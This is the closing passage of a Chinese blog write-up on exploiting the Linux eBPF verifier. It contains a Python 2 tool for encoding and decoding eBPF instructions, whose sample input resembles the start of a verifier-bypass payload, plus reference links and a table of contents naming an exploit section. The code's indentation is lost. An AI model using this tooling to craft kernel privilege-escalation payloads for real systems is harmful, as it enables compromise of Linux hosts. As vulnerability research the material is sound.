opcode[BPF_STX | BPF_XADD | BPF_DW] = "STX_XADD_DW"
opcode[BPF_ST | BPF_MEM | BPF_B] = "ST_MEM_B"
opcode[BPF_ST | BPF_MEM | BPF_H] = "ST_MEM_H"
opcode[BPF_ST | BPF_MEM | BPF_W] = "ST_MEM_W"
opcode[BPF_ST | BPF_MEM | BPF_DW] = "ST_MEM_DW"
#/* Load instructions */
opcode[BPF_LDX | BPF_MEM | BPF_B] = "LDX_MEM_B"
opcode[BPF_LDX | BPF_MEM | BPF_H] = "LDX_MEM_H"
opcode[BPF_LDX | BPF_MEM | BPF_W] = "LDX_MEM_W"
opcode[BPF_LDX | BPF_MEM | BPF_DW] = "LDX_MEM_DW"
opcode[BPF_LD | BPF_ABS | BPF_W] = "LD_ABS_W"
opcode[BPF_LD | BPF_ABS | BPF_H] = "LD_ABS_H"
opcode[BPF_LD | BPF_ABS | BPF_B] = "LD_ABS_B"
opcode[BPF_LD | BPF_IND | BPF_W] = "LD_IND_W"
opcode[BPF_LD | BPF_IND | BPF_H] = "LD_IND_H"
opcode[BPF_LD | BPF_IND | BPF_B] = "LD_IND_B"
opcode[BPF_LD | BPF_IMM | BPF_DW] = "LD_IMM_DW"

def u16(imm):
if len(imm)!=2:
print '[-] u16 must have a correct input like "\\x12\\x34"'
exit()
return (ord(imm[1])<<8)+ord(imm[0])
def u32(imm):
if len(imm)!=4:
print '[-] u32 must have a correct input like "\x12\x34\x56\x78"'
exit()
return (ord(imm[1])<<8)+ord(imm[0]) +(ord(imm[2])<<16)+(ord(imm[3])<<24)
def p16(imm):
result = ''
for i in range(2):
result += "\\x"+ hex((imm>>(8*(i)))&0xff).replace('0x','').rjust(2,'0')
return result
def p32(imm):
result = ''
for i in range(4):
result += "\\x"+ hex((imm>>(8*(i)))&0xff).replace('0x','').replace('L','').rjust(2,'0')
return result


def decode_single(idx,insn):
#print insn.encode('hex')
op = opcode[ord(insn[0])]
reg = ord(insn[1])
off = insn[2:4]
imm = insn[4:]
if op == 'invalid opcode':
print '[%d]: maybe padding'%idx
return
print "[%d]: %s(%s,%s,%s,%s)"%(idx,op,str(reg>>4),str(reg&0x0f),hex(u16(off)).replace('L',''),hex(u32(imm)).replace('L',''))

def decode_all(insn_tmp):
insn = insn_tmp.split('"\n')
i = 0
for ins in insn:
ins = ins.strip()
if len(ins)<9:
break
if ins[-9]!= '"':
print '[-] format error!'
exit()
decode_single(i,ins[-8:])
i += 1

def banner_decode():
print '[+] A tools for decode ebpf rules by P4nda'
print '[+] modify code in script as format :'
print '========================================================='
print '\t\t"\\xbf\\xa2\\x00\\x00\\x00\\x00\\x00\\x00"'
print '\t\t"\\x07\\x02\\x00\\x00\\xfc\\xff\\xff\\xff"'
print '\t\t"\\xbf\\xa2\\x00\\x00\\x00\\x00\\x00\\x00"'
print '\t\t"\\x07\\x02\\x00\\x00\\xfc\\xff\\xff\\xff"'
print '\t\t"\\xbf\\xa2\\x00\\x00\\x00\\x00\\x00\\x00"'
print '\t\t"\\x07\\x02\\x00\\x00\\xfc\\xff\\xff\\xff"'
print '========================================================='
print 'result format: \t[index]: opcode(src,dst,off,imm)'
print '================= result ================================'

def str2int(input):
if input.startswith('0x'):
return int(input,16)
return int(input)
def char2hex(input):
return '\\x'+hex(input).replace('0x','').replace('L','').rjust(2,'0')
def encode_single(rl):
rl = rl.strip()
result = ''
if ('(' not in rl) | (')' not in rl) :
if 'padding' in rl :
print '\t"%s"'%('\\x00'*8)
return
else:
print '[-] bad rules '
exit(-1)
op = rl.split('(')[0]
src = str2int(rl.split('(')[1].split(',')[0])
dst = str2int(rl.split('(')[1].split(',')[1])
off = str2int(rl.split('(')[1].split(',')[2])
imm = str2int(rl.split('(')[1].split(',')[3].split(')')[0])
#print src,dst,off,imm
for i in range(256):
if op.upper() == opcode[i]:
result += char2hex(i)#'\\x'+ hex(i).replace('0x','').replace('L','').rjust(2,'0')
break
if len(result) == 0:
print '[-] No such insn :',op
exit(-1)
result += char2hex((src<<4)+dst)
result += p16(off)
result += p32(imm)
print '\t"%s"'%result

def encode_all(rules):
for rl in rules.split('\n'):
if ('padding' in rl) |(('(' in rl)&(')' in rl) ):
encode_single(rl+')')
def banner_encode():
print '[+] A tools for encode ebpf rules by P4nda'
print '[+] modify code in script as format :'
print '========================================================='
print '\t\t ALU_MOV_K(0,9,0x0,0xffffffff)'
print '\t\t JMP_JNE_K(0,9,0x2,0xffffffff)'
print '\t\t ALU64_MOV_K(0,0,0x0,0x0)'
print '\t\t LD_IMM_DW(1,9,0x0,0x3)'
print '\t\t padding \t/*this word will be translateed \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00*/'
print '\t\t JMP_EXIT(0,0,0x0,0x0)'
print '========================================================='
print 'result format: \t"\\x07\\x02\\x00\\x00\\xfc\\xff\\xff\\xff"'
print '================= result ================================'
def banner():
print '[+] A tools for encode&decode ebpf rules by P4nda'
print '[+] modify code in script yourself ,function argv as follow:'
print '========================================================='
print 'encode:'
print '\tebpf_tools.py encode '
print 'decode:'
print '\tebpf_tools.py decode '
print '========================================================='


if __name__ == '__main__':
if len(sys.argv) ==1 :
banner()
exit(0)
if sys.argv[1].lower() == 'decode':
banner_decode()
decode_all(code)
elif sys.argv[1].lower() == 'encode':
banner_encode()
encode_all(rules)
else:
banner()

参考

[1] https://security.tencent.com/index.php/blog/msg/124

[2] https://www.ibm.com/developerworks/cn/linux/l-lo-eBPF-history/index.html

[3] https://www.jianshu.com/p/75b368f85dc6

[4] https://cert.360.cn/report/detail?id=ff28fc8d8cb2b72148c9237612933c11

[5] https://xz.aliyun.com/t/2212

[6] https://blog.csdn.net/qq_14978113/article/details/80488711

[7] https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/syscall.c

[8] https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c

[9] https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/core.c

文章目录
  1. 1. EBPF模块分析
    1. 1.1. EBPF指令集介绍
    2. 1.2. BPF_MAP_CREATE
    3. 1.3. BPF_PROG_LOAD
      1. 1.3.1. bpf_prog_load
      2. 1.3.2. bpf_check
      3. 1.3.3. replace_map_fd_with_map_ptr
      4. 1.3.4. do_check
        1. 1.3.4.1. Q&A1:for循环如何会检查结束并退出
        2. 1.3.4.2. Q&A2:能否进行直接的内存读写?
    4. 1.4. __bpf_prog_run
  2. 2. 漏洞利用
    1. 2.1. 利用整数扩展问题绕过bpf_check
    2. 2.2. 漏洞利用
  3. 3. 相关代码
    1. 3.1. EXP
    2. 3.2. ebpf_tool
  4. 4. 参考
|